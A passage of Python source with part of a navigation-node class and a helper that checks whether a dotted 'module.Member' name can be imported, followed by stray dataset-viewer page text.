        self.navigation_id = nav_id
        self.child_items = []
        self.tags = None

    def add_child(self, child):
        """Attach ``child`` as a sub-item of this navigation node."""
        self.child_items.append(child)
def is_valid_type_name(type_name):
    """Return True if ``type_name`` ("module.Member") is importable.

    The module part (everything before the last ".") is imported and the
    remainder is checked against the module's members. Returns False for
    names without a module part, modules that fail to import, or members
    missing from an imported module.
    """
    try:
        module_end_index = type_name.rfind(".")
        if module_end_index > 0:
            module_name = type_name[:module_end_index]
            class_name = type_name[module_end_index + 1:]
            mod = importlib.import_module(module_name)
            # any() short-circuits instead of materializing the full
            # member list as the original comprehension did.
            return any(member_name == class_name
                       for member_name, _ in inspect.getmembers(mod))
    except Exception:
        # Narrowed from a bare `except:` which also swallowed
        # SystemExit/KeyboardInterrupt.
        logging.error("Failed to import {}".format(type_name))
    return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.